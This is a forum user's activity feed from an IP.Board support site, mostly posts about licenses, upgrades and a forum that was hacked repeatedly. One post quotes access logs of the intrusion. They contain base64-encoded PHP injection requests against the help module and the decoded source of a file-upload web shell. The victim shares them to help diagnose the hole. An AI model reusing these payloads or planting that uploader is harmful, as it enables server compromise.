SeanQ

+Clients
  • Content count

    85
  • Joined

  • Last visited


SeanQ's Activity

  1. SeanQ added a comment on a blog entry: IP.Board 3.3.x, 3.4.x Security Update   

    Lets say I applied this patch on my 3.4.6 board 2 days ago. Today I upgraded to 3.4.7
    Am I going to have to update again?
  2. SeanQ added a post in a topic: License key listed as expired?   

    ​Thanks mark, where can I tell that it was approved? I used PP so I assume it was auto approved 
    Under purchases it states - 
    Expires
    17 Jun 2015
  3. SeanQ added a post in a topic: License key listed as expired?   

    Hey,
    So recently my key was removed from the board so  I re-added it. but when I re-added it I also needed to renew the purchase. which I did but on the admin page it still says the key is expired even thought I just renewed, is there anyway to force IPB to recheck the key? I've restarted the server but the status has not changed.
     
     
  4. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB   

    Nope, but we've installed a pretty decent monitoring script which sends and php email every time someone does anything on the site. When we get hacked for the 4th time now, we'll know exactly how he does it and where the vulnerability is. Once we've isolated the cause, we're going to submit it to the appropriate place, be it the shoutbox thread or if it's an issue with IPB itself, report it to the team.
    EDIT:
    How exactly can we force a global password reset? The hacker has taken our DB, and I would like to make that version of the DB unusable as soon as possible.
  5. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB   

    We are absolutely certain this isn't the issue. Not only is this not the issue, but we've isolated every possible malware related cause and we can pretty much confirm this isn't it. A completely clean installation of IPB, on a completely new and clean server, on completely new accounts (ftp not even set up), with a completely clean and new shoutbox, is still getting hacked. If you're still unsure, we had one of our server admins install all of this on his own on a virtual machine. So his computer can't have been trojan'd.
     
    I'm not really sure what to do here. We're a pretty big site, and we've been down for very long because the hacker seems to have an unknown grudge against us.
  6. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB   

    Nothing to do with password or ftp account issues at, all passwords get 100% for their security ratting (10-15chars (aA0-9! ect.))
    also we dont have any bruteforce logs only php logs 
    also this was on a new server not the same one, so not a backdoor or a bad password (as ftp accounts weren't setup yet) 
    csf is installed and at 100% green
    ssh was set to a random port and denied password connections and needed a key file to log in same with FTP
     
    anyways going through the access-logs files we've found the exploit, seems like it has to do with accounts > the shoutbox hook > the Help section of the site (index.php?app=core&module=help&_b=)
     
     
    This command is ran right before the files are added( obviously as the following commands create the files)
    31.193.15.136 - - [13/Jun/2013:10:13:47 -0400] "GET /forum/index.php?&app=shoutbox&module=ajax&section=coreAjax&secure_key=e96047891b4ee24594bf29d7b5705d72&type=getShouts&lastid=669&global=1 HTTP/1.1" 200 1435 "http://fkn0wned.net/forum/index.php?app=core&module=help&_b=cGFzc3RocnUoJ2xzJyk7" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0"   31.193.15.136 - - [13/Jun/2013:10:14:15 -0400] "GET /forum/index.php?&app=shoutbox&module=ajax&section=coreAjax&secure_key=a106a4547f538a9fa97b5f32b363ee83&type=getShouts&lastid=670&global=1 HTTP/1.1" 200 879 "http://fkn0wned.net/forum/index.php?app=core&module=help&k=a106a4547f538a9fa97b5f32b363ee83&setlanguage=1&langurlbits=app=core&module=help&cal_id=&langid=2&_b=ZWNobyAxOw==" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"     31.193.15.136 - - [13/Jun/2013:10:14:17 -0400] "GET /forum/index.php?&app=shoutbox&module=ajax&section=coreAjax&secure_key=e96047891b4ee24594bf29d7b5705d72&type=getShouts&lastid=670&global=1 HTTP/1.1" 200 1367 "http://fkn0wned.net/forum/index.php?app=core&module=help&_b=cGFzc3RocnUoJ2xzJyk7" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0"   31.193.15.136 - - [13/Jun/2013:10:14:17 -0400] "GET /forum/public/style_emoticons/default/biggrin.png HTTP/1.1" 200 973 "http://fkn0wned.net/forum/index.php?app=core&module=help&_b=cGFzc3RocnUoJ2xzJyk7" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0"     31.193.15.136 - - [13/Jun/2013:10:14:30 -0400] "GET /forum/index.php?app=core&module=help&_b=JGZoID0gZm9wZW4oImludGVyZmFjZS9kb25nLnBocCIsICJ3Iik7CmZ3cml0ZSgkZmgsIGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnSUNBZ0NpQWdJQ0JsWTJodklDYzhabTl1ZENCamIyeHZjajFjSjBkeVpXVnVYQ2MrUUZwcGVHVnRQRE04TDJadmJuUStQR2h5SUM4K1BHWnZjbTBnYldWMGFHOWtQU0p3YjNOMElpQmxibU4wZVhCbFBTSnRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhJaUJoWTNScGIyNDlJaUkrQ2p4MVBsVndiRzloWkNCbWFXeGxMand2ZFQ0Z1BHSnlMejRnUEdsdWNIVjBJSFI1Y0dVOUltWnBiR1VpSUc1aGJXVTlJbVpwYkdWZmJtRnRaU0lnTHo0S1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdkbUZzZFdVOUlsVndiRzloWkNJZ2JtRnRaVDBpZFhCc2IyRmtYMlpwYkdVaUlDOCtDand2Wm05eWJUNG5Pd3BwWmlocGMzTmxkQ2drWDFCUFUxUmJKM1Z3Ykc5aFpGOW1hV3hsSjEwcEtTQjdDbWxtS0cxdmRtVmZkWEJzYjJGa1pXUmZabWxzWlNna1gwWkpURVZUV3lkbWFXeGxYMjVoYldVblhWc25kRzF3WDI1aGJXVW5YU3drWDBkRlZGc25jQ2RkTGlJdklpNGtYMFpKVEVWVFd5ZG1hV3hsWDI1aGJXVW5YVnNuYm1GdFpTZGRLU2tnZXdwbFkyaHZJQ0k4Wm05dWRDQmpiMnh2Y2owblIzSmxaVzRuUGp4alpXNTBaWEkrUm1sc1pTQjFjR3h2WVdSbFpDQnpkV05qWlhOelpuVnNiSGtvUEdadmJuUWdZMjlzYjNJOUowSnNZV05ySno0OGFUNTdKRjlHU1V4RlUxc25abWxzWlY5dVlXMWxKMTFiSjI1aGJXVW5YWDA4TDJadmJuUStQQzlwUGlrdVBDOWpaVzUwWlhJK1BDOW1iMjUwUGp3dlkyVnVkR1Z5UGlJN0NuMEtaV3h6WlNCN0NtVmphRzhnSWp4bWIyNTBJR052Ykc5eVBTZFNaV1FuUGp4alpXNTBaWEkrUm1sc1pTQmtiMlZ6SUc1dmRDQjFjR3h2WVdSbFpDZzhabTl1ZENCamIyeHZjajBuUW14aFkyc25QanhwUG5za1gwWkpURVZUV3lkbWFXeGxYMjVoYldVblhWc25ibUZ0WlNkZGZUd3ZabTl1ZEQ0OEwyTmxiblJsY2o0OEwyaytLUzQ4TDJadmJuUStQQzlqWlc1MFpYSStJanNLZlFwOUNqOCsiKSk7 HTTP/1.1" 200 14902 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0" the following above is Base64 converted it makes this
    $fh = fopen("interface/dong.php", "w"); fwrite($fh, base64_decode("PD9waHAgICAgCiAgICBlY2hvICc8Zm9udCBjb2xvcj1cJ0dyZWVuXCc+QFppeGVtPDM8L2ZvbnQ+PGhyIC8+PGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBhY3Rpb249IiI+Cjx1PlVwbG9hZCBmaWxlLjwvdT4gPGJyLz4gPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGVfbmFtZSIgLz4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9hZCIgbmFtZT0idXBsb2FkX2ZpbGUiIC8+CjwvZm9ybT4nOwppZihpc3NldCgkX1BPU1RbJ3VwbG9hZF9maWxlJ10pKSB7CmlmKG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlX25hbWUnXVsndG1wX25hbWUnXSwkX0dFVFsncCddLiIvIi4kX0ZJTEVTWydmaWxlX25hbWUnXVsnbmFtZSddKSkgewplY2hvICI8Zm9udCBjb2xvcj0nR3JlZW4nPjxjZW50ZXI+RmlsZSB1cGxvYWRlZCBzdWNjZXNzZnVsbHkoPGZvbnQgY29sb3I9J0JsYWNrJz48aT57JF9GSUxFU1snZmlsZV9uYW1lJ11bJ25hbWUnXX08L2ZvbnQ+PC9pPikuPC9jZW50ZXI+PC9mb250PjwvY2VudGVyPiI7Cn0KZWxzZSB7CmVjaG8gIjxmb250IGNvbG9yPSdSZWQnPjxjZW50ZXI+RmlsZSBkb2VzIG5vdCB1cGxvYWRlZCg8Zm9udCBjb2xvcj0nQmxhY2snPjxpPnskX0ZJTEVTWydmaWxlX25hbWUnXVsnbmFtZSddfTwvZm9udD48L2NlbnRlcj48L2k+KS48L2ZvbnQ+PC9jZW50ZXI+IjsKfQp9Cj8+")); If we decode this
    <?php         echo '<font color='Green'>@Zixem<3</font><hr /><form method="post" enctype="multipart/form-data" action=""> <u>Upload file.</u> <br/> <input type="file" name="file_name" /> <input type="submit" value="Upload" name="upload_file" /> </form>'; if(isset($_POST['upload_file'])) { if(move_uploaded_file($_FILES['file_name']['tmp_name'],$_GET['p']."/".$_FILES['file_name']['name'])) { echo "<font color='Green'><center>File uploaded successfully(<font color='Black'><i>{$_FILES['file_name']['name']}</font></i>).</center></font></center>"; } else { echo "<font color='Red'><center>File does not uploaded(<font color='Black'><i>{$_FILES['file_name']['name']}</font></center></i>).</font></center>"; } } ?> So that was the uploader _--_   31.193.15.136 - - [13/Jun/2013:10:14:33 -0400] "GET /forum/interface/dong.php HTTP/1.1" 200 232 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"   31.193.15.136 - - [13/Jun/2013:10:14:47 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36" 31.193.15.136 - - [13/Jun/2013:10:14:49 -0400] "GET /forum/interface/b_.php HTTP/1.1" 200 120 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36" 31.193.15.136 - - [13/Jun/2013:10:14:49 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"   anyways after dong.php was created shortly later b_.php was created  this was just the shell which I wont post    and well once the shell is uploaded they would have full access   
    If anyone wants to view the full access-logs and spread some light on the issue 
    http://pastebin.com/VhBi71gU
    The log file has been isolated to only include the originating server
     
     
    I suggest you block ip 136.15.193.31 - 0day server which is where this exploit started 
    From what I can see any IPB board running SB( both the old(1.2) version of the shoutbox and the new beta(1.4) version were installed during this exploit) on a clean install with no hardening done would be exposed to this exploit, unless someone wants to explain these messages 
     

    You don't go to a poker game and show your hand on the deal
  7. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB   

    Well we have a person who works as a server manager at a pretty big datacenter. He too is tied up about how they're doing this. However, what is the interface folder used for? Would it damage the board if we got rid of it completely?
    EDIT:
    Oh wait, that's where the IPB main files are stored.
    EDIT2:
    I'll pay anyone 50 bucks to help secure the server and find out how he gets in successfully. I'd love you forever.
    EDIT3:
    The only thing in common has been the skin on all 3 installations. Our graphics designer is pretty bad at coding, so there might be some holes here and there. Is that even possible? To get full server access through some shoddy skin code?
  8. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB   

    He uploaded the shell to the interface seciton of the server twice. Isn't that were all the extra stuff is linked? How do we disable that?
  9. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB   

    Alright, now it's getting silly. We've been hacked 3 times. The first 2 times, we through individual IPB plugins caused it. However, on the 3rd time, we were on a completely new server with no plugins, a fresh install of IPB, new user accounts, new passwords for server-related stuff, and everything new. And they STILL got in.
     
    is there some exploit with IPB going on at the moment? The hacker claims that we can't ever fix it no matter how many times we switch servers and reset.
  10. SeanQ added a post in a topic: Anyone had this problem with their shoutbox?   

    Basically, the whole forum index loads inside the shoutbox and the refresh thing refreshes a hundred times a second. The actual index is gone and you'll have to browse the site through the shoutbox. I'm using the latest version (1.4.1 beta 1b) of the shoutbox. Should I downgrade to 1.4.0? It didn't say if that one was compatible with 3.4.x of IPB.

  11. SeanQ added a post in a topic: Importing old DB to new site(new version)   

    Um wow nvm I did what I said above and IPB realize it needed to be upgraded .. /impressed 
    this topic can be closed  my apologizes 
  12. SeanQ added a post in a topic: Importing old DB to new site(new version)   

    Hi there,
     
    I've recently installed 3.4.5 and I have a DB from 3.3.2 that I want to import into the fresh install 
    Now I know how I would normally import a db into a table I could delete the current table that IPB made and then
    remake an empty table then just run the command 
    mysql db_name < db.sql 
     
    but I'm worried that this will cause errors. I can't run the upgrade option because this is a new server 
    is there anyway to convert a 3.3.2 db into  a 3.4.5 db?
     
    Thanks 
  13. SeanQ added a post in a topic: Reinstalled IPB and now no plugins will work   

    I've reimported, recached (including skins), and I've also tried replacing the xml files with the ones from my HD in case they were corrupted somehow. Nothing has worked.
    EDIT:
    It's really strange, because everything works except hooks and plugins. None of those are functional at all. This includes the shoutbox, and even modules from the IP team themselves, like the downloads manager.
  14. SeanQ added a post in a topic: Reinstalled IPB and now no plugins will work   

    Someone got into our server by abusing a vulnerability with the awards plugin we were using, and he deleted the index page + cpanel. Nothing else was done, since he locked himself out by deleting cpanel.
     
    The index page being gone was a bigger problem than we'd thought, and we decided to simply reinstall IPB with the same database and everything. However, even though it's the same IPB version, no hooks or plugins will work. We're using IPB version 3.3.4, and have been recluctant to upgrade because we're dependant on so many community hooks.
  15. SeanQ added a post in a topic: Loading an older backup to downgrade: For some reason it's loading the old forum   

    I did load the old database, but it still gives me this.
    It's giving me this:
    http://i.imgur.com/5YdVkLu.png
     

Status Feed